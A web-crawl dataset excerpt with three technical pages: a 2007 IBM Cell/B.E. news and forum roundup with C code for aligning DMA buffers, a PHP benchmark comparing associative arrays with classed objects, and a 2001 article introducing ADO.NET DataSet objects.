text
stringlengths 454
608k
| url
stringlengths 17
896
| dump
stringclasses 91
values | source
stringclasses 1
value | word_count
int64 101
114k
| flesch_reading_ease
float64 50
104
|
|---|---|---|---|---|---|
Cell/B.E. SDK makes leap from v2.1: IBM announced the IBM Software Developers Kit (SDK) for Multicore Acceleration Version 3.0 which allows customer applications to run across a variety of Cell/B.E. processor and x86-based systems. Versions of the SDK and documentation will be available in September and October 2007 -- visit the Cell Resource Center for updates.
IBM also announced the IBM BladeCenter QS21, built for the Cell/B.E. processor, which promises to be one of the worlds' most energy-efficient blade servers. It too will be available in October 2007.
Maryland gets some speed out of the Cell/B.E.: UMaryland and IBM are planning something fast -- the Multicore Computing Center facility that will focus on supercomputing research related to aerospace/defense, financial services, medical imaging, and weather/climate change prediction. The high performance test lab will be based on the Cell/B.E. processor. One of the first challenges of the center will be to make the clusters run effectively together. Made possible by an award from IBM, the center is expected to be ready to go sometime in Fall 2007.
Institute preps recruitment drive for next-gen nanotechnologists: The neophyte National Institute for Nano-Engineering (Nine) wants to "increase American competitiveness in nanotechnology ... [by] exciting them [students] with compelling [engineering and science] problems and offering them the opportunity to make real progress toward solutions." The Sandia Labs-centered coalition Nine intends to use funds from the America Competes Act to popularize nanotechnology in three key areas -- nanoelectronics, nanoenergy generation, and nanomanufacturing.
Dense gravity DOES distort spacetime: NASA Goddard astronomers, using instruments on the European Space Agency's XMM-Newton X-ray observatory and the Japanese/NASA Suzaku X-ray observatory (and peeking at three neutron stars), have detected a distorted iron spectral line. The spectral line from hot iron atoms whirling in a disk around the dense star systems at 40 percent the speed of light were shifting to longer wavelengths and broadening asymmetrically by virtue of the Doppler effect in combo with the "beaming" effect predicted by Einstein's special theory of relativity. So there.
Neural biomech leads the prosthetics revolution: The newest challenge in designing tomorrow's prosthesis -- linking the devices to the nervous system to control them in a real-time fashion. Researchers at a recent IEEE bioengineering conference discussed high-performance neural microarray sensor nets implanted in the brain (for piano-playing artificial limbs), algorithms that could offer basic function control with signals from an electroencephalogram monitor worn on the scalp, successful experimentation with single-finger flexing using as few as 30 neurons, how much of the effort should be shifted to algorithm development away from electronics (the finer the movement, the less effective the electronics are; more may be gained by tuning the math responding to the signals), various worn and implanted devices to read and analyze brain signals at frequencies from 1Hz to 10kHz, and what method is best to capture signals.
Save power usage with security designed FOR the device: This commentary weighs the cost of security (applications and systems) on devices (which may be the rule rather than the exception by the time you read this) in terms of how draining they may be on the battery. The author notes that security implementation requires processing power which demands more of the battery on mobile devices. And that "stupid" security (poorly designed, incompatible, or chucked in as an afterthought) tends to draw off battery power with such mechanisms as polling or anything that keeps the CPU in motion. The author goes on to note that "securing applications by any means" will keep mobile device applications extremely inefficient.
Universe has hole, film in eleven billion years: UMinnesota astrophysicists say they've found a billion-light-year-across void in the universe and they don't know why it's there. "What we've found is not normal, based on either observational studies or on computer simulations of the large-scale evolution of the Universe." The region even appears to lack dark matter. The void is in a region of sky in the constellation Eridanus, southwest of Orion. The graphics are worth a look.
Come October, you get real StarWars in space: No, not the missile defense shield. For some reason, NASA has decided to "honor" the 30th year of the movie series franchise by launching the original prop lightsaber into space with the Discovery STS-120 mission in October. Now what did that poor prop do to deserve that?
Nucleus RTOS and EDGE tools target IBM chip: Mentor Graphics is in collaboration with IBM to port Mentor's Nucleus real-time operating system and the EDGE Developer Suite to the Cell/B.E. processor (first target: IBM BladeCenter servers). Included will be the entire range of the Nucleus OS components, the Eclipse-based EDGE Developer Suite, and the EDGE MAJIC JTAG probe, all with Cell/B.E.-specific extensions and features.
Have you seen the Cell/B.E. partner products database?: The growing database just added two new Cell/B.E.-related partner downloads. The current offering stands at five:
Sharing a love for game development: The Insomniac Games R&D site is publicly sharing its development files (with other game studios and individual developers) in the hopes of getting more, high quality games out there for the PS3. The company promises to feature a large variety of documentation like tips on how to optimize a certain piece of code or hardware, internal and conference presentations, and articles.
Memory has to be maintained: Weizmann Institute neuroscientists have discovered that long-term memories are not etched in a stable form; the process is more dynamic and on-going and it involves a miniature molecular machine that must run constantly to keep memories going. If you jam the machine, you can erase long-term memories. A synapse protein known as PKMzeta acts as a miniature memory machine -- it keeps memory up and running by changing some facets of the structure of synaptic contacts, but it must be persistently active to maintain this change (which is brought about by learning). A drug can jam the enzymatic machine causing erasure of long-term memories regardless of how long ago they were formed.
Disabling c: Two UKoblenz physicists claim they've used quantum tunneling to make photons travel faster than the speed of light. When they placed two prisms (forming the halves of a cube) together, the microwave photons traveled through them as expected. After they were moved a meter apart, most photons reflected off the first prism and were picked up by a detector; a few, though, appeared to tunnel through the gap separating them as if the two halves were still together. Although they traveled farther, they arrived at the detector at the same time -- therefore, they moved faster than light. The scientist say this is the only violation of the special relativity they know of. (One of the best comments to this news story was "Can these scientists get a job at my local transit and get the buses moving beyond their usual glacial pace?").
Light pulses put a new "spin" on quantum supercomputing: The paper, "Quantum Computers Based on Electron Spins Controlled by Ultrafast Off-Resonant Single Optical Pulses," details a scheme to create one of the fastest quantum computers to date by using light pulses to rotate electron spins which serve as quantum bits. This technique improves the overall clock rate of the quantum computer. The researchers combined fast single-bit rotations and fast two-qubit gates (both optically controlled) on a single chip. The chip consists of a loop of cavities (called a "loop-qubus") -- each cavity holds a quantum dot, a small piece of semiconductor that contains a single electron. When you focus an optical pulse at a quantum dot, the electron spins rotate, changing the state of the bit. Very detailed piece of work.
Taking.
IBM BladeCenter Products and Technology: This Redbooks draft introduces IBM BladeCenter and describes the technology and features of the different chassis, blade server models, and connectivity options, as well as goes into details about every major component and provides guidance on networking and storage connectivity. It is an update to an earlier Redpaper and it includes new products that have been announced in the first half of 2007, including the BladeCenter HT chassis, BladeCenter HS21 XM server blade, and a variety of switch modules and expansion cards.
Where would your System p be without LPAR?: The Redbook "Simplifying Logical Partitioning for System i and System p" shows you how logical partitioning (LPAR) provides the capability to run multiple operating systems, each a partition on the same physical processor, memory, and I/O attachment configuration. The publication describes and provides examples of using the 2007 enhancements to the system planning and deployment tools and processes for planning, ordering, and deploying a partitioned environment on IBM System i and IBM System p configurations.
Implementing Sun Solaris on IBM BladeCenter Servers: This Redpaper describes how to install Solaris on supported BladeCenter servers, either natively or with the use of a Solaris Installation Server and covers how to incorporate the latest patches to Solaris from Sun, plus updated drivers for the Ethernet and RAID devices in the blade servers. It also explains how to implement Fibre Channel storage and how to configure boot from SAN; and you get to learn how to integrate blade servers running Solaris into an IBM Director or SNMP-based management infrastructure.
A quarter of century and just a few scratches on her: On August 17, the CD turned 25. On August 17, 1982, Royal Philips Electronics manufactured the world's first compact disc at a Philips factory in Langenhagen, outside of Hanover, Germany. (For you youngsters, CDs were how the generation before you captured and carried music.)
Sony's CCB gets Houdini-like special effects software: Side Effects Software Inc. announced today that it is working with Sony to provide Side Effects Software's award-winning Houdini server tools (Houdini Batch and Mantra) to Sony's new Cell Computing Board. Houdini Master is a suite for animation, 3D modeling, visual effects, simulation, compositing, and rendering that was originally designed for the motion picture industry.
Houdini Batch is the non-graphical version of Master that offers users command-line access to the program's features. You can set up a render farm and generate render scene description files and build up large numbers of scenes procedurally at render time using shared assets. Houdini Batch runs with the Houdini Master and Houdini Escape licenses.
Houdini Mantra is a state-of-the-art hybrid scan-line/ray-trace renderer that supports global illumination and point cloud textures.
More rendering for Cell/B.E. and this time it's mental: Academy Award-winning mental image's mental ray high-end rendering software may also be coming to the Sony Cell Computing Board -- the two companies expect to demonstrate their results in the second half of 2008. mental ray.
From July 3 to August 10, 2007: Also, the "best" Cell/B.E. compiler. Discover how to transfer a variable-length DMA array from PPU to SPU. Just what is the gameOS in PS3? What's the expected behavior when starting more pthreads than SPEs? Can you run a PS3 game on the PS3 Cell/B.E. simulator? Do FC7 and SDK 2.1 play well together? Plus, two questions for you to answer.
This new blog-based column looks at some of the more interesting problems and challenges posed recently in the Cell Broadband Engine Architecture forum.
Problem: Where I can find information about compilers the Cell/B.E. supports?
Resolved: One of the best compilers you can find to program in C the Cell/B.E. processor is cellsuperscalar, developed at the Barcelona's Supercomputing Center. Its most powerful features are:
and it's made in Spain!
Problem: I want to copy a DMA array of variable length from the ppu to the spu, but I always get a bus error when I DMA the array to the SPU. Presumably, this is due to the fact that the array (the size of which is determined at run-time) isn't aligned to a 16 byte boundary. It's possible to circumvent this by using a large (static size) buffer and use memcpy from the array to the buffer, but this clearly is insufficient.
Here's an example that illustrates my problem:
-------------------------hello.h-------------------------#ifndef HELLO_H#define HELLO_H HELLO_Hstruct __attribute__ ((aligned (16))) context{ unsigned int size; int* test;};#endif //HELLO_H-------------------------hello.cpp-------------------------#include <iostream>#include <string>#include <algorithm>extern "C"{#include <libspe.h>}#include "hello.h"extern spe_program_handle_t hello_spu;int* __attribute__((aligned (16))) test;unsigned newsize(unsigned i){ unsigned j = 0; for(;j <= i;j += 16); return j;}int main(){ int size; std::cout<<"Vector length: "; std::cin >> size; test = (int*) malloc(newsize(size)*sizeof(int)); for(int i =0;i<size;i++){ test[i] = i; } for(int i=0;i<size;i++){ std::cout<<"t["<<i<<"] = "<<test[i]<<std::endl; } context ctx __attribute__ ((aligned (16))); ctx.size = newsize(size); ctx.test = test; speid_t speid = spe_create_thread(0, &hello_spu, &ctx, NULL, -1, 0); if(!speid){ std::cerr << "Unable to create SPE thread" << std::endl; free(test); return 1; } int status = 0; spe_wait(speid, &status, 0); std::cout << "Squared vector:" <<std::endl; for(int i=0;i<size;i++){ std::cout<<"t["<<i<<"] = "<<test[i]<<std::endl; } free(test); return 0;}-------------------------hello_spu.cpp-------------------------#include <cbe_mfc.h>#include <spu_intrinsics.h>#include "hello.h"volatile context ctx;volatile int* test;int main(unsigned long long spu_id, unsigned long long parm){ unsigned int tag_id = 0; spu_writech(MFC_WrTagMask, -1); //select all tag groups to be included in query or wait ops spu_mfcdma32((void *)(&ctx), (unsigned)parm, sizeof(context), tag_id, MFC_GET_CMD); //fetch context spu_mfcstat(2); //wait for DMA transfer to complete spu_mfcdma32((void *)(test), (unsigned)ctx.test, ctx.size, tag_id, MFC_GET_CMD); //fetch test vector spu_mfcstat(2); //wait for DMA transfer to complete for(int i =0;i<ctx.size;i++){ test[i]=test[i]*test[i]; } spu_mfcdma32((void *)(test), (unsigned int)(ctx.str), ctx.size, tag_id, MFC_PUT_CMD); //write squared vector spu_mfcstat(2); //wait for DMA transfer to complete return 0;}
Original questioner: Nevermind, I just found the solution myself. Instead of the normal malloc(), I used this:
malloc()
test = (int*) malloc(127+newsize(size)*sizeof(int));while (((int) test) & 0x7f)++test;
Resolved: Also, you have several ways to do it:
malloc_aligned()
free_aligned()
void *p;vopd *p_aligned;p = malloc(127+size); p_aligned = (p+127) & (~0x7f);
you have to preserv p since you want to do free() later. (and here I am not careful with "pointer type size" when applying masks, so you have to check it.)
p
free()
Problem: What is the OS used in the PS3 gameOS partition? I think it's Linux, but which version?
Resolved (from IBM's Dan Greenberg): The game partition of the PS3 runs Sony's proprietary Game OS. The Game OS and its related tools are covered by a strict non-disclosure agreement between Sony and game developers, therefore, discussions of the Game OS are out of scope for any open forum (like the Cell Broadband Engine Architecture forum).
Sony however has made it possible to run Linux in a separate partition. There are now several flavors being worked, with YDL officially supported and FC used to run the most current IBM SDK. That's well within scope here.
Problem: I was reading the Cell Broadband Engine Programming Tutorial and I found some description of programming models for the Cell/B.E. However, I find it difficult to classify between the Function Offload Model, Computer Accelerated Model and the Asymmetric Thread Runtime Model.What's the distinguishing factors between these 3 models?
Resolved: The Function Offload Model specifically notes the use of program stubs via IDL. This is mainly used to offload some work from an existing application to the SPEs and does not take full advantage of the parallel capabilities of the CBE. You can see samples of this in /opt/ibm/cell-sdk/prototype/src/tools/idl/samples, though this is not usually used in the SDK.
The Computation-Acceleration Model does not specify how the code is run on the SPEs, just that the SPEs run the computation-intensive code and the PPE acts more as a controller. In this model the SPEs work in parallel (as apposed to the Streaming Model where they stream data from SPE to SPE).
The Asymmetric-Thread Runtime Model is specific in saying that threads are created on the SPEs using spe_context_create/spe_context_run. This is the model most SDK examples use. It supports the other models since you can use SPE threads with Computation-Acceleration and Streaming, for example.
Problem: Thanks for the reply -- I just need to clear some doubts. In the Streaming Model, the data moves from one SPE to another and in each SPE, a particular computation/work is applied to the data? If that's the case, how come the Euler particle example (from the tutorial) states that it is a Streaming model? Because it basically just divides the data equally among available SPEs, there's no moving data from SPE to SPE.
Resolved: Sorry for the confusion -- that just goes to show how much the various models overlap and that the distinction between them can be subtle.
The streaming model means that a computational kernel is iterated over a large set of input data. In the case of the Euler example, the data is first parallel pipelined. Then each SPE independently executes in accordance with the streaming model by repeatedly loading a buffer of particles, performing the timestep computation, and storing the results back out to memory.
When processing moves "PPE -> SPE1 -> SPE2 ... SPEn -> PPE" it is a pipeline (serial) programming model.
The computational acceleration model is more like the function-offload model in that the PPE deploys SPEs to accelerate a computational task. Depending on the size of the computational problem, a data streaming technique may be employed by the accelerators.
Problem:?
Resolved: In 1.1 the threads would block, so that if 6 are in use and you start a 7th, it will block until one of those 6 exits. 2.1 has the pre-emptive scheduler so it can time-slice for realtime threads.
Problem: OK, but I don't understand why the preemptive scheduling results in an apparent deadlock between threads. Is there synchronization that must be done to run more threads than SPUs?
Resolved: Are you setting a scheduling policy with set_create_group() (LIBSPE1) or pthread_attr_setschedpolicy()/pthread_attr_setschedparam() (LIBSPE2)?
set_create_group()
pthread_attr_setschedpolicy()
pthread_attr_setschedparam()
Problem: No, I have set no scheduling policy at all. I am referring to the sample program that came with the SDK, in /opt/ibm/cell-sdk/prototype/src/samples/tutorial/simple. By the way, since starting this thread, I have updated to SDK 2.1 and still observe the same behavior.
Resolved: There are some known problems with pre-emption in SDK 2.1 that will be fixed in the next release, so it's possible you're hitting those and that's why the behavior is not consistent.
Problem: Various sites imply that the Cell/B.E. simulator can emulate the PS3 and its games and software. Is this true? How would I do this?
Resolved: The Cell BE simulator simulates only the CPU of the PS3, but not the graphical engine or memory system. The simulator gives programmers a system on which to simulate their code, therefore you can output if you wish to a file the data and commands to send to the GPU for further analysis, but not on the fly.
(IBM's Dan Greenberg): The general answer is no. PS3 games depend on having a specific stack -- hardware (including GPU and memory subsystem), firmware, GameOS -- in place. Many of these components are not available for the simulator and/or won't run if they were available. With so many gaps in the system, you're unlikely to get a useful result.
Problem: Does anyone know if the Cell/B.E. SDK 2.1 can be installed in FC7 without any problems?
Resolved: Readers suggest that:
I've had success installing SDK 2.1 on both x86 and PPC (PS3) Fedora 7 hosts.
In my experience, the SDK itself works correctly on Fedora 7 on my laptop (x86) and a Playstation 3. However, you could encounter some issues while cross-compiling applications for a Cell/B.E. system. The SDK system root (/opt/cell/sysroot) contains libraries built for Fedora Core 6, namely glibc 2.5. Cross-compiling will link against these libraries. While these applications seem to run on a Cell/B.E. system with Fedora 7, some issues can arise while debugging. I had an hard time debugging pthreads before discovering this. That said, you can copy the libraries from Fedora 7 in the SDK system root. Personally, I made a NFS share of the filesystem root on my PS3 and mounted it on my laptop over /opt/cell/sysroot.
I have successfully installed SDK 2.1 on Fedora 7. I also had problems downloading the packages from BSC, and then got stuck when trying to install the Eclipse plugin. In the end I didn't use the update function, but copied the files manually to /usr/share/eclipse.
Ed: This is a really good entry to read if you're having problems which this particular situation since the readers ask and answer more detailed problems than are covered here.
|
https://www.ibm.com/developerworks/community/blogs/powerarchitecture/date/200708?lang=en
|
CC-MAIN-2014-10
|
refinedweb
| 3,594
| 52.39
|
PHP: Use associative arrays!
Benchmark environment
My test system is a Lenovo X1 Carbon 2017 Edition, i5-7300U CPU @ 2.60GHz, 16 GB of RAM, running Kubuntu 18.04. The PHP version is
7.2.5-0ubuntu0.18.04.1. XDebug is disabled. (Always do that before running benchmarks!) I have as much background processing turned off as I could manage, though on modern systems runtime optimizations mean there will always be some variation and jitter.
You will almost certainly get different absolute numbers than I do but the relative values should be about the same.
Associative arrays (Baseline)
The baseline test looks like this:
<?php declare(strict_types=1); error_reporting(E_ALL | E_STRICT); const TEST_SIZE = 1000000; $list = []; $start = $stop = 0; $start = microtime(true); for ($i = 0; $i < TEST_SIZE; ++$i) { $list[$i] = [ 'a' => random_int(1, 500), 'b' => base64_encode(random_bytes(16)), ]; } ksort($list); usort($list, function($first, $second) { return [$first['a'], $first['b']] <=> [$second['a'], $second['b']]; }); $stop = microtime(true); $memory = memory_get_peak_usage(); printf("Runtime: %s\nMemory: %s\n", $stop - $start, $memory);
That is, we build an array of 1 million items, where each item is an associative array containing an int and a short string. This "anonymous struct" is very typical of the type of data structure I'm talking about, which is often assigned to a private property within an object and only accessed within it. (Although some systems like to expose these anonymous structs as though they were an API, which is one of the most developer-hostile API designs I have ever seen. You know who you are.) 1 million items is somewhat larger than a typical use case but we want to stress test it, so go big or go home.
The goal is to measure the memory used by all of those nested arrays as well as the time it takes to process them. For that, we're sorting the array twice, once by the key (which should be a no-op) and once by the array itself, using a custom sort function.
As a second test, I also want to check the serialization size. These giant lookup tables are often built once and serialized to a database for cache lookup, so knowing the trade off there is also useful. For that we use this slightly different script:
<?php declare(strict_types=1); error_reporting(E_ALL | E_STRICT); const TEST_SIZE = 1000000; $list = []; $start = $stop = 0; $start = microtime(true); for ($i = 0; $i < TEST_SIZE; ++$i) { $list[$i] = [ 'a' => random_int(1, 500), 'b' => base64_encode(random_bytes(16)), ]; } $ser = serialize($list); unserialize($ser); $stop = microtime(true); $memory = memory_get_peak_usage(); printf("Runtime: %s\nMemory: %s\nSize: %s\n", $stop - $start, $memory, strlen($ser));
To account for natural jitter in the process, I ran each test once to prime it (although on the CLI that shouldn't matter, but it doesn't hurt). Then I run three more times in a row and average the results. Here's the results for our baseline test:
Associative array (Sorting)
Associative array (Serialize)
So about 9.4 seconds and a half GB of memory to work with associative arrays. The serialized form is 68 MB. The runtime is pretty stable and the memory usage is constant, as expected. (The slight variation is most likely due to randomly generated numbers of different length.) Those are the values to beat.
stdClass
For completeness let's switch to a
stdClass object. I predicted this would be about the same as structurally
stdClass objects are basically associative arrays that pass by handle instead of by value. Here's the new tests (the boilerplate start and end parts omitted):
for ($i = 0; $i < TEST_SIZE; ++$i) { $o = new stdclass(); $o->a = random_int(1, 500); $o->b = base64_encode(random_bytes(16)); $list[$i] = $o; } ksort($list); usort($list, function($first, $second) { return [$first->a, $first->b] <=> [$second->a, $second->b]; });
And here's the data:
stdClass (Sorting)
stdClass (Serialize)
Huh. I expected the serialized version to be a bit bigger as it needs to store the string "stdClass" over and over again. I didn't expect it to also be measurably slower and less memory efficient than associative array. It's not a massive difference, and at smaller cardinality it probably wouldn't be measurable, but it's definitely there.
Why does anyone use
stdClass again?
Object with public properties
Now let's get into the real test. In this case we'll predefine a class to use for our list and use two public properties on it. PHP doesn't support typed properties in PHP 7.2 (although it looks like it probably will in an upcoming version), but it does still do various optimizations to object structures when it knows the properties in advance. Let's see if those optimizations pan out in practice.
Here's our test code:
class Item { public $a; public $b; } for ($i = 0; $i < TEST_SIZE; ++$i) { $o = new Item(); $o->a = random_int(1, 500); $o->b = base64_encode(random_bytes(16)); $list[$i] = $o; } ksort($list); usort($list, function($first, $second) { return [$first->a, $first->b] <=> [$second->a, $second->b]; });
And the data:
Public properties (Sorting)
Public properties (Serialize)
BOOM! For sorting, a proper classed object is measurably faster than an array but the big difference is on memory. It uses half as much memory as the array version did. Half.
Serialization didn't fair quite so well. It's about on par with
stdClass time-wise but a bit more efficient space-wise. I strongly suspect that's because the string "Item" is shorter than "stdClass", which gets repeated over and over in the serialized value. That's something to note if dealing with a namespaced class as then the serialized class name can be quite long.
Object with private properties
A lot of people (like yours truly) preach against using public properties, though, in favor of protected properties and methods. That does introduce more method calls into our test, though. How will that fare?
Here's the new test code:
class Item { protected $a; protected $b; public function __construct(int $a, string $b) { $this->a = $a; $this->b = $b; } public function a() : int { return $this->a; } public function b() : string { return $this->b; } } for ($i = 0; $i < TEST_SIZE; ++$i) { $list[$i] = new Item(random_int(1, 500), base64_encode(random_bytes(16))); } ksort($list); usort($list, function(Item $first, Item $second) { return [$first->a(), $first->b()] <=> [$second->a(), $second->b()]; });
And the data:
Private properties (Sorting)
Private properties (Serialize)
As predicted, adding methods to the mix slows it down a bit. The memory usage is very close to the public property version. Somehow the serialized version got a little bit slower and larger, but not dramatically. Again, at lower cardinality it would probably not be measurable.
Anonymous classes
Of course, some people are allergic to defining classes. I don't know why but they still view it as a slow and expensive thing to do. Maybe they're concerned about file count (given that PHP by convention uses file-per-class structure, although nothing in the langauge mandates that). For completeness, though, let's define an anoymous class inline and see how it measures up. We'll only do the public-property version as we know that adding methods will slow it down a tad.
One thing to note, however, is that anonymous classes cannot be serialized. If you need to serialize your data structure then anonymous classes are a no-go. We'll skip that test, of course.
Here's the code:
for ($i = 0; $i < TEST_SIZE; ++$i) { $o = new class(random_int(1, 500), base64_encode(random_bytes(16))) { public $a; public $b; public function __construct(int $a, string $b) { $this->a = $a; $this->b = $b; } }; $list[$i] = $o; }
And the data:
Anonymous class (Sorting)
Right in the same neighborhood as the named class, give or take. So for about the same performance and no ability to serialize it, you don't need to define a class by name. I'm sure someone will argue that is a good trade off but that someone would not be me.
Summary
Here's our final data, showing the percent change relative to our baseline for each value (negative number means decrease, which is good):
Summary (Sorting)
Summary (Serialize)
What can we conclude from all of this?
First off, a reminder that we're dealing with a cardinality of 1 million here. That means if your cardinality is 4, odds are you won't notice an earth-shattering difference no matter what you do. However, it's still good to get into good habits in case your cardinality does grow considerably. just about every other situation I can think of, named classes win. Their memory usage is half that of a corresponding array. The optimizations the engine can do when it knows up front what the structure of your data is going to be are massive and pay off huge dividends in memory consumption. They're also over 10% faster. The only downside is when trying to serialize them when there is an added cost to time, memory, and stored size. When we also consider that a classed object is far more self-documenting than an associative array, gives IDEs the ability to auto-complete for you, and gives you a place to include additional documentation (which you should include), it's one of the clearest wins I've seen in PHP.
In other words, if you're one of those people who claims that "good code is self-documenting, you don't need comments", and you're not using a classed object, then you're not just wrong, you're a hypocrite who's also wrong. Don't be that person.
The question of public properties vs methods is, I would argue, open. They do offer a more structured, self-documenting, more flexible approach but at the same time do have a hefty CPU penalty over associative arrays. (They still destroy arrays on memory, though.) Whether that is a good trade off or not depends on your use case. My default recommendation would be, when we're talking about what is essentially a private class, use public properties for the main data but don't feel shy about adding additional methods to the object if you want to compute stuff off of it, or it makes sorting easier, or it somehow otherwise is helpful for your use case. Putting a constructor on the class so you can initialize it in a single line is probably a good idea, and I expect would be a wash performance-wise.
As another consideration, it's common these days for larger frameworks to generate code based on plugin information and store that on disk not as a serialized string but as a generated PHP class that can then be just loaded like any other. (Think Dependency Injection Containers, Event Dispatchers, theme systems where you can register template plugins, etc.) In that case the serialization point is moot and you have absolutely no excuse for not using a named class. Generating out a big nested associative array into your compiled code is just flat out inexcusably wasteful. Don't do that. Stop it.
Although I only ran the tests on PHP 7.2 I'm reasonably confident these results will hold back to PHP 7.0 and later. It's possible they would be different on PHP 5, but since all versions of PHP 5 will be fully unsupported within 6 months I really don't care if they're applicable.
tl;dr: Use named classes with public properties for big internal data structures. If you're still using nested associative arrays for that, You're Doing It Wrong(tm).
I always start with arrays for quick prototyping then I jump back to objects for storing the same data. Not only because I suspected it would be faster (because of the class definition) but because the data I'm sharing with has their own methods that knows how to deal with that data. Here is an example that I moved array structures into their own class, the code is much nicer and it runs a bit faster if you measure a few million times.
Interesting article that confirms my theory :D, thanks for writing it.
Nice! Yeah, the ability to encapsulate behavior is one of the most obvious benefits of a class but there's been a general belief in PHP for years that doing so was more expensive than doing it "manually". That may have been true once, but it's definitely not true today. In fact quite the opposite.
An addendum, as a few people have pointed out to me on Twitter:
This applies to runtime behavior. PHP has another optimization where, if you define an array as a
constit gets placed in shared memory with the code, so the net memory cost to each process using that array is 0.
That's really only applicable if:
In that case, a
constbig nested array may indeed be better both for CPU and memory.
The runtime builder for that compiled code, though, is still better off using objects for memory efficiency so that you can produce that compiled code.
As always, context matters. :-)
Great write up, Larry. I won’t fight you. You made a good argument.
Oh good. We have enough things to fight about. I'd hate to add programming optimization to the list. :-)
Nice benchmark !
And what about extending
Serializableon the named class to still store it as an associative array ?
Is it the best win-win combo ? Of course we need to ask if defining serialization for simple data struct is relevant 😊.
My guess is it would be slower because it has to call serialize/deserialize in user-space for each class. It might end up being smaller but the performance cost is likely not worth it. That said, I haven't tried.
How about using the array_multisort() instead of usort():
Running on a mac book pro, 2.2GHz Intel Core i7, 16GB, listing Av. of 3 runs:
Associative array (Sorting)
Object with public properties (sorting):
a tradeoff between memory and runtime ...
Interesting observation! If you're sorting an array, yes, that would make a big difference. However, the purpose of
usort()here was to provide a direct comparison between objects and arrays, so they had to be used in the same way. That meant
usort()so that we could compare the property access in each. I didn't as much care about the sorting itself as sorting was an easy way to call
$array['a']and
$object->aa few zillion times. :-)
This is rather older, but here's a post from Nikita Popov explaining the difference in storage in PHP 5.4:
The structs have changed dramatically in PHP 7, but the basic optimization he describes is still with us, and is the reason for these results.
Some more recent posts on the topic, too:
Hi there:
I really tried to use model classes but it is impractical.
Let's say we want to json_serialize. Ok, it is not a problem. But what if we have a field that it's composed by another model
Serializing it's not fun. However, de-serializing (json) is a big challenge because the system doesn't understand the field $typeCustomer if an object and it de-serialize as stdClass, then every method attached to TypeCustomer fails.
upvote for me please?
Very good post. I often had these issues with associative arrays while writung the code for websites like
|
https://steemit.com/php/@crell/php-use-associative-arrays-basically-never
|
CC-MAIN-2022-21
|
refinedweb
| 2,578
| 61.77
|
" Vim syntax file " Language: wDiff (wordwise diff) " Maintainer: Gerfried Fuchs <alfie@ist.org> " Last Change: 25 Apr 2001 " URL: " " Comments are very welcome - but please make sure that you are commenting on " the latest version of this file. " SPAM is _NOT_ welcome - be ready to be reported! " For version 5.x: Clear all syntax items " For version 6.x: Quit when a syntax file was already loaded if version < 600 syn clear elseif exists("b:current_syntax") finish endif syn region wdiffOld start=+\[-+ end=+-]+ syn region wdiffNew start="{+" end="+}" " Define the default highlighting. " For version 5.7 and earlier: only when not done already " For version 5.8 and later: only when an item doesn't have highlighting yet if version >= 508 || !exists("did_wdiff_syn_inits") let did_wdiff_syn_inits = 1 if version < 508 let did_wdiff_syn_inits = 1 command -nargs=+ HiLink hi link <args> else command -nargs=+ HiLink hi def link <args> endif HiLink wdiffOld Special HiLink wdiffNew Identifier delcommand HiLink endif let b:current_syntax = "wdiff"
|
http://opensource.apple.com/source/vim/vim-44/runtime/syntax/wdiff.vim
|
CC-MAIN-2016-18
|
refinedweb
| 160
| 64.81
|
Dino Esposito
April 26, 2001
Recently, I've thrown myself into the somewhat evangelic task of bringing ADO.NET to the masses. While debating the intrinsic beauty of the ADO.NET object model, I find a hardly surmountable hurdle in the perception of its similarity with ADO, which hails from such an object model.
The majority of the questions focus around the key improvements in ADO.NET.
The disconnected model of computing? "Do you mean the model that ensures high levels of scalability for Web applications? Oh my, it was already available since the times of ADO 2.0."
Tight integration with XML? "You're kidding, right? XML and ADO celebrated their wedding in ADO 2.1 and reinforced the pact with ADO 2.5. Indeed, it was a very successful union."
The seamless integration with the rest of the framework? "What kind of framework are you talking about? Is it COM or COM+, or perhaps you are referring to MFC?"
The word "framework," though, is the first successful attempt to break the wall of "interested coldness"—if not "hot apathy"—that sometimes surrounds and welcomes presentations about ADO.NET.
This doesn't mean that developers are really unconcerned about data access in general, and ADO.NET in particular. They would rather hear about new prodigious features and astonishing strengthening of existing services. Instead, to program with ADO.NET, they end up using connections and commands working against data providers. They grab static snapshots of records and ask the runtime to reconnect and submit changes when they're done. They persist their content to XML streams.
So people reasonably ask what's really new with ADO.NET. And the subliminal sensation that nothing is really new progressively grows as the presentation rolls out and unveils what's under the ADO.NET covers.
Again, framework is indeed the word that represents the first crack in an otherwise plain and solid skepticism that can be easily observed by you, the ADO.NET presenter.
ADO.NET has unprecedented integration with the surrounding system SDK (in this case, the .NET Framework). Such seamless integration goes from the design patterns and type system of the base class libraries all the way up through Web Services and ASP .NET. Regardless of your programming model, as long as you stay in .NET, ADO.NET classes are the preferred way to go for data access.
In the last column, I covered data readers—a simple and efficient forward cursor to scroll a set of data rows. In this column, the spotlight is for DataSet objects—the .NET class that is the quintessence of disconnected and XML-driven data containers.
The most accurate description for a DataSet object is in the title of this column. It sounds even more precise if you preface it with an "in-memory" qualifier. So putting it all together, you should think of a DataSet object as an in-memory, database-like data container.
The DataSet can be filled out as the result of a query command run against an OLE DB or a Managed provider. Regardless of the different syntax and structure, at least in the simplest contexts you end up using the DataSet object in much the same way you would with ADO Recordsets. You create them, set some arguments, and then have both filled up with data, care of a special command (usually a SQL command). Next, you move your record pointer back and forth over the table of records and update or delete records.
So far nothing is really different from an ADO Recordset. And nothing really justifies such a "revolution" in the object model. Due to the lack of a Recordset object in ADO.NET, backward compatibility is significantly broken up in the existing ADO code. However, at the end of the day, just the lack of a Recordset object is what significantly brings you to optimize the design and the performance of your data access components.
Let's start by reviewing the aspects in which ADO Recordset and DataSet objects are similar. Both can be disconnected, serialize themselves to XML, and can be fabricated manually using disconnected data. And both support data shaping, local sorting, filtering, and batch update.
As many design aspects make them significantly different as well. DataSets are data-centric as opposed to the database-centric nature of recordsets. DataSets work only in memory and in no time of their existence have anything to do with databases or, in general, with data sources. DataSet objects are in-memory repositories of tables; as many tables as you need and not just one as is the case with recordsets.
In addition, a DataSet can serialize its content to XML but without the burden of necessarily creating a disk file. While in ADO, XML is a mere output format; in ADO.NET, instead, XML is the underlying representation of the object. The XML representation of the DataSet content is available all the time through a special set of properties and methods. In no way is the representation built at runtime through a spooky instance of the XML DOM object.
DataSets can use different schemas of data to create their XML output or to rebuild from a remote source. The hierarchical XML model and the relational Recordset schema happily cohabitate within the DataSet object context giving you an unprecedented power of navigation over a set of records.
